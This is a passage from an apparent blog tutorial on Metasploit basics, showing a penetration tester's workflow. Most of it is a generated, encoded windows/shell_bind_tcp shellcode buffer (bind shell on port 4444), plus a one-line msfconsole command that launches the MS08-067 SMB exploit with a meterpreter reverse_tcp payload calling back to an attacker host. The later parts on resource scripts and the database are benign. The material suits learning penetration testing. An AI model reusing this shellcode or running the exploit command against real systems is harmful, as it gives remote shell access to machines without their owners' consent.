"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd" +
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b" +
"\x13\x7b\x7b\x7b\x00\x7b\xff\xd5"

or, all together:

msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt

# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x89\xe5\xd9\xe5\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x79\x78\x4c\x42\x65\x50\x75\x50" +
"\x33\x30\x43\x50\x6b\x39\x5a\x45\x56\x51\x4f\x30\x75\x34" +
"\x4c\x4b\x50\x50\x64\x70\x6c\x4b\x70\x52\x66\x6c\x6c\x4b" +
"\x46\x32\x77\x64\x6e\x6b\x62\x52\x76\x48\x54\x4f\x68\x37" +
"\x70\x4a\x76\x46\x74\x71\x79\x6f\x4e\x4c\x67\x4c\x43\x51" +
"\x63\x4c\x63\x32\x34\x6c\x31\x30\x4b\x71\x58\x4f\x54\x4d" +
"\x53\x31\x48\x47\x6a\x42\x78\x72\x72\x72\x31\x47\x6e\x6b" +
"\x36\x32\x74\x50\x6c\x4b\x50\x4a\x75\x6c\x4c\x4b\x50\x4c" +
"\x42\x31\x63\x48\x68\x63\x52\x68\x76\x61\x6a\x71\x50\x51" +
"\x6e\x6b\x50\x59\x71\x30\x36\x61\x6a\x73\x6e\x6b\x73\x79" +
"\x64\x58\x6b\x53\x56\x5a\x47\x39\x6c\x4b\x35\x64\x6e\x6b" +
"\x55\x51\x39\x46\x75\x61\x4b\x4f\x4e\x4c\x6f\x31\x38\x4f" +
"\x66\x6d\x43\x31\x49\x57\x45\x68\x49\x70\x74\x35\x4c\x36" +
"\x54\x43\x73\x4d\x39\x68\x67\x4b\x33\x4d\x46\x44\x70\x75" +
"\x48\x64\x76\x38\x6c\x4b\x53\x68\x67\x54\x45\x51\x78\x53" +
"\x62\x46\x6e\x6b\x74\x4c\x72\x6b\x6e\x6b\x56\x38\x65\x4c" +
"\x36\x61\x58\x53\x4e\x6b\x46\x64\x6e\x6b\x65\x51\x4e\x30" +
"\x6c\x49\x32\x64\x75\x74\x47\x54\x51\x4b\x53\x6b\x61\x71" +
"\x63\x69\x31\x4a\x36\x31\x59\x6f\x6b\x50\x63\x6f\x53\x6f" +
"\x73\x6a\x6c\x4b\x32\x32\x6a\x4b\x6c\x4d\x71\x4d\x51\x78" +
"\x37\x43\x65\x62\x73\x30\x45\x50\x32\x48\x53\x47\x44\x33" +
"\x56\x52\x51\x4f\x70\x54\x71\x78\x50\x4c\x30\x77\x74\x66" +
"\x67\x77\x6b\x4f\x4e\x35\x4c\x78\x5a\x30\x65\x51\x37\x70" +
"\x37\x70\x51\x39\x4f\x34\x51\x44\x70\x50\x30\x68\x75\x79" +
"\x6b\x30\x72\x4b\x37\x70\x6b\x4f\x4e\x35\x63\x5a\x77\x78" +
"\x31\x49\x32\x70\x48\x62\x6b\x4d\x77\x30\x42\x70\x61\x50" +
"\x56\x30\x65\x38\x69\x7a\x66\x6f\x79\x4f\x69\x70\x39\x6f" +
"\x39\x45\x6e\x77\x52\x48\x67\x72\x67\x70\x44\x51\x43\x6c" +
"\x4e\x69\x6b\x56\x63\x5a\x54\x50\x32\x76\x71\x47\x31\x78" +
"\x4f\x32\x49\x4b\x37\x47\x32\x47\x69\x6f\x78\x55\x36\x37" +
"\x71\x78\x4d\x67\x5a\x49\x46\x58\x4b\x4f\x4b\x4f\x6a\x75" +
"\x50\x57\x45\x38\x74\x34\x7a\x4c\x65\x6b\x59\x71\x6b\x4f" +
"\x68\x55\x52\x77\x4a\x37\x63\x58\x43\x45\x62\x4e\x32\x6d" +
"\x31\x71\x79\x6f\x79\x45\x30\x68\x71\x73\x62\x4d\x62\x44" +
"\x43\x30\x6e\x69\x59\x73\x52\x77\x66\x37\x30\x57\x66\x51" +
"\x4b\x46\x63\x5a\x62\x32\x63\x69\x70\x56\x6b\x52\x39\x6d" +
"\x63\x56\x6f\x37\x73\x74\x55\x74\x77\x4c\x57\x71\x56\x61" +
"\x4c\x4d\x53\x74\x44\x64\x62\x30\x6a\x66\x37\x70\x51\x54" +
"\x42\x74\x52\x70\x61\x46\x66\x36\x70\x56\x71\x56\x43\x66" +
"\x32\x6e\x63\x66\x70\x56\x31\x43\x72\x76\x33\x58\x31\x69" +
"\x68\x4c\x75\x6f\x4c\x46\x69\x6f\x4e\x35\x4f\x79\x39\x70" +
"\x52\x6e\x70\x56\x77\x36\x6b\x4f\x30\x30\x61\x78\x53\x38" +
"\x4b\x37\x57\x6d\x33\x50\x39\x6f\x38\x55\x4f\x4b\x68\x70" +
"\x6d\x65\x6d\x72\x51\x46\x50\x68\x59\x36\x6e\x75\x4f\x4d" +
"\x6f\x6d\x6b\x4f\x38\x55\x67\x4c\x47\x76\x73\x4c\x46\x6a" +
"\x4d\x50\x6b\x4b\x49\x70\x74\x35\x34\x45\x4d\x6b\x57\x37" +
"\x76\x73\x74\x32\x32\x4f\x33\x5a\x55\x50\x36\x33\x79\x6f" +
"\x6a\x75\x41\x41"

Scripting

Metasploit framework supports the users write scripts to control the process. There are three ways to read a script:

  1. > msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"  
    
  2. > msfconsole -r my_script.rc
    
  3. (in msfconsole)

    msf > resource my_script.rc
    

Database

When conducting a penetration test, it is frequently a challenge to keep track o feverything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has build-in support for the PostreSQL database system. (Reference)

Here are some helpful commands:

  • help database
  • hosts
  • services
  • db_nmap: same as nmap but results will be saved in to current database
  • db_import
  • db_export -f xml [filepath for xml]

Conclusion

Metasploit is a powerful tool that allows people can raise attacks with the aid of its exploit database. Although this post only contains the basic usages of Metasploit with one example which is hardly to describe its strength, I will keep update this post if I found anything new and worth sharing.